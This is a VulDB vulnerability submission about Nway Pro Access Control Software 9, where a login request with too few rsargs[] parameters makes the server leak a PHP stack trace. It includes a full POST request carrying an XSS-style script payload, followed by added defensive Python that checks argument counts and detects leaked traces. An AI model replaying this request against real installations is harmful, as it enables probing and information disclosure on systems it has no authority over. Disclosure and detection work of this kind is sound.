| Title | Nway Pro Access Control Software 9 Cross-site Request Forgery |
|---|
| Description | A vulnerability was found in Nway Pro Access Control Software Version 9, from https://nwaypro.com/. The login functionality needs at least 11 "rsargs[]" POST parameters to function properly; if you give fewer than 11, the application responds with a PHP stack trace, disclosing part of the parameters' values. An example of the response body is:
Notice: Undefined offset: 10 in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php on line 1557
+:
Fatal error: Uncaught ArgumentCountError: Too few arguments to function ajax_login_submit_form(), 10 passed in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\login_sajax.php on line 122 and exactly 11 expected in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php:2247
Stack trace:
#0 C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\login_sajax.php(122): ajax_login_submit_form('<script>/*........', '*/s="XSS";/*}S]...', '*/s+="XSS";/*', 'aaaa', '*/alert(s)/*alt...', '', '', '', '1111', '-->*/</script>;...')
#1 C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php(2196): sajax_handle_client_request()
#2 {main}
thrown in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php on line 2247
This is the response for the following POST request:
POST /v9/app/nwaypro/login/ HTTP/1.1
Host: <IP>
Cookie: PHPSESSID=3c4427832be4dbab96e51c96a3df8aa0; sc_actual_lang_Corporativo=pt_br
Content-Length: 322
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Content-Type: application/x-www-form-urlencoded
Method: POST /v9/app/nwaypro/login/ HTTP/1.1
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/v9/app/nwaypro/login/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,pt-BR;q=0.8,pt;q=0.7
Priority: u=1, i
Connection: close
rs=ajax_login_submit_form&rst=&rsrnd=1708369374052&rsargs[]=<script>/*......adsfasdfads&rsargs[]=*/s="XSS";/*%7DS%5DUHcJ2T%3E&rsargs[]=*/s%2b="XSS";/*&rsargs[]=aaaa&rsargs[]=*/alert(s)/*alterar&rsargs[]=&rsargs[]=&rsargs[]=&rsargs[]=1111&rsargs[]=-->*/</script>%3B5E-Z%7B_(Eb6HMM3*0!M)2N9hPc!wSWS%3B11O_%7D0%5DC7%3Bs2hW0Ur
This can be used to forge malicious requests using the vulnerable application.
The login URL is: https://<IP>/v9/app/nwaypro/login/. |
|---|
| Source | ⚠️ https://x.x.x.x/v9/app/nwaypro/login/ |
|---|
| User | lorenzomoulin (UID 33175) |
|---|
| Submission | 19.02.2024 22:22 (2 years ago) |
|---|
| Moderation | 29.02.2024 14:28 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 255266 [Nway Pro 9 Argument login\index.php ajax_login_submit_form rsargs[] Information Disclosure] |
|---|
| Points | 20 |
|---|
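Defender-side checks for the failure mode described in the submission above, added here as an example; this is not code from the VulDB entry or from the vendor. The argument count (11) and the error strings are taken from the stack trace quoted above; the request bodies and the response text used as input are constructed.

```python
"""Added example: detect the Nway Pro login condition described above.

Check 1 (request side): a reverse proxy or the login handler itself should
refuse an ajax_login_submit_form call whose rsargs[] count is not 11 and
answer with a generic error, so the call never reaches PHP with too few args.
Check 2 (response side): flag a leaked PHP stack trace so it can be blocked
at the proxy or raised as an alert by a log monitor.
"""
from urllib.parse import parse_qs

EXPECTED_RSARGS = 11  # from the trace: "exactly 11 expected"

# strings from the leaked response shown in the submission
LEAK_MARKERS = ("Stack trace:", "Uncaught ArgumentCountError",
                "Fatal error:", "Notice: Undefined offset")


def count_rsargs(body: str) -> int:
    # keep_blank_values: empty rsargs[]= entries are still arguments
    return len(parse_qs(body, keep_blank_values=True).get("rsargs[]", []))


def validate_login_request(body: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a login POST body."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("rs") != ["ajax_login_submit_form"]:
        return True, "not the login submit function"
    n = count_rsargs(body)
    if n != EXPECTED_RSARGS:
        return False, f"rsargs[] count {n} != {EXPECTED_RSARGS}; reject with generic error"
    return True, "argument count ok"


def response_leaks_trace(body: str) -> bool:
    """True if a response body contains a PHP error or stack trace."""
    return any(marker in body for marker in LEAK_MARKERS)


def make_body(n_args: int) -> str:
    # constructed body in the shape shown above; every third value is left
    # blank to mirror the empty rsargs[]= entries in the original request
    args = "&".join("rsargs[]=" + ("" if i % 3 == 2 else f"v{i}")
                    for i in range(n_args))
    return f"rs=ajax_login_submit_form&rst=&rsrnd=1708369374052&{args}"


# constructed response text modelled on the leaked error shown above
CONSTRUCTED_LEAK = ("Fatal error: Uncaught ArgumentCountError: Too few arguments "
                    "to function ajax_login_submit_form(), 10 passed\nStack trace:")
```

On the PHP side the same two conditions map to checking the argument count before dispatch and running production with `display_errors=Off`, so that an error reaches the log rather than the HTTP response.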